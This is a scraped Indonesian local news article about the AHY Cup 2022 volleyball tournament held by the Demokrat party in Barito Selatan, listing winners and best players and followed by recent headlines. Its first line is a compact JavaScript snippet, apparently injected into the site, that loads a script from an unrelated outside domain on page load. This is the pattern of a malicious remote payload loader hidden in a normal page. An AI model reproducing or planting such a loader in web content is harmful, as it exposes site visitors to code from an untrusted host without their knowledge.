(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');

Putra Demokrat dan Alva Putri Juara Turnamen AHY Cup 2022 Barsel


KANALKALIMANTAN.COM, BUNTOK – Turnamen bola voli AHY Cup 2022 secara resmi ditutup dengan hasil tim Putra Demokrat dan tim Alva Putri sebagai juara.

Untuk pemain terbaik yang terpilih pada ajang turnamen AHY Cup tingkat DPC Kabupaten akan mengikuti turnamen tingkat provinsi Kalteng yang akan digelar di Palangkaraya.

“Para pemain terbaik yang telah ditetapkan panitia telah dikantongi. Mereka ini nanti akan mengikuti turnamen bola voli AHY Cup tingkat Provinsi Kalteng,” kata Ketua DPC Partai Demokrat Barsel, Idariani usai menutup turnamen AHY Cup, Sabtu (23/9/2022) malam.

Ia mengatakan seluruh pemain terbaik yang terpilih dari DPC Partai Demokrat 14 kabupaten 1 kota akan bertanding pada turnamen bola voli AHY Cup Provinsi Kalteng.

 

Baca juga  : Hujan Lebat, Jalan A Yani Banjarbaru Terendam Air

Menurutnya turnamen ini selain dalam rangka HUT ke-21 Partai Demokrat juga menjawab karena selama 2 tahun dalam pandemi Covid-19.

“Oleh sebab itu kita melaksanakan turnamen bola voli ini untuk memberikan hiburan masyarakat khususnya pencita bola voli,” ujar Ida.

Masih kata wanita yang merupakan Ketua KONI Barsel dan Anggota DPRD Barsel dari Partai Demokrat itu menyampaikan setelah kurang lebih 6 hari melaksanakan turnamen bola voli mendapatkan para juara dan pemain terbaik terpilih baik putra maupun putri.

“Semoga ini tidak hanya AHY Cup yang pertama, namun akan berlanjut setiap tahunnya,” kata dia.

 

Baca juga  : Soroti BBM Naik hingga Perubahan Iklim, Aliansi Petani Kalsel Aksi di Bundaran Banjarbaru

Adapun juara pada turnamen AHY Cup ini untuk putri juara pertamanya diraih Alva Putri, juara II Star Club, juara III DPC Demokrat Putri dan juara IV Tim Sanggu.

Sementara kategori putra juara I DPC Partai Demokrat Putra, juara II Alva Putra, juara III SBV A dan juara IV SBV B.

Best player putri diraih Mariatun Nisa dan best player putra Gojali Pasaribu.

“Para juara ini selain mendapatkan piala dan piagam penghargaan juga mendapatkan uang pembinaan,” pungkas Ida.(Kanalkalimantan.com/digdo)

Reporter : digdo
Editor : kk


Desy Arfianty

Recent Posts

Modus Pinjam Bendera Perusahaan Korupsi Proyek RS Kelua Tabalong

Empat Terdakwa Jalani Sidang, Satu Orang Mantan Kepala Dinas Kesehatan Read More

47 menit ago

Camat Lurah Boleh Jabat Sekretariat PPK PPS

KANALKALIMANTAN.COM, BANJARBARU - Camat dan Lurah diperbolehkan menjabat sebagai Sekretariat Panitia Pemungutan Kecamatan (PPK) maupun… Read More

14 jam ago

Sekretaris Nasdem Kalsel Melamar Golkar, Rozanie Sadar Cukup Posisi Calon Wagub

KANALKALIMANTAN.COM, BANJARMASIN - Pemilihan Kepala Daerah (Pilkada) serentak 2024, sejumlah tokoh mulai mencari dukungan partai… Read More

14 jam ago

Mesin Terbakar di Udara, Pesawat Jemaah Haji Kloter 5 Embarkasi Makassar Kembali Mendarat

KANALKALIMANTAN.COM, MAKASSAR - Momen mencekam mewarnai penerbangan 450 jemaah haji asal Sulawesi Selatan (Sulsel) terjadi,… Read More

14 jam ago

Meteran Air Leding PAM Bandarmasih Hilang, Biaya Pergantian Ditanggung Pelanggan

KANALAKALIMANTAN.COM, BANJARMASIN - Pelanggan air bersih Perusahan Air Minum (PAM) Bandarmasih Kota Banjarmasin Provinsi Kalimantan… Read More

15 jam ago

Layanan Posyandu Terintegrasi di Desa Manusup

KANALKALIMANTAN.COM, KUALA KAPUAS – Upaya memberikan pelayanan kesehatan dasar kepada masyarakat terus dilakukan Pos Pelayanan… Read More

15 jam ago

This website uses cookies.